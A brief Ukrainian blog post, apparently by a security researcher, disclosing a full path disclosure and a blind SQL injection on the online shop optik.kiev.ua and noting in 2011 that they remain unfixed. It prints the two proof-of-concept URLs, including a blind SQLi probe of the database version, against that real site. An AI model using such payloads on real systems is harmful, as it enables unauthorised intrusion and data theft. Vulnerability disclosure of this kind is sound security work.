Уразливості на optik.kiev.ua
23:53 02.09.201113.11.2010
У липні, 25.07.2010, я знайшов Full path disclosure та SQL Injection уразливості на сайті http://optik.kiev.ua. Про що найближчим часом сповіщу адміністрацію сайта.
Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на www.allo.ua.
Детальна інформація про уразливості з’явиться пізніше.
02.09.2011
Full path disclosure:
http://optik.kiev.ua/article.php?root=a
SQL Injection (blind SQLi):
http://optik.kiev.ua/article.php?root=-1%20and%20version()=4.1
Дані уразливості досі не виправлені.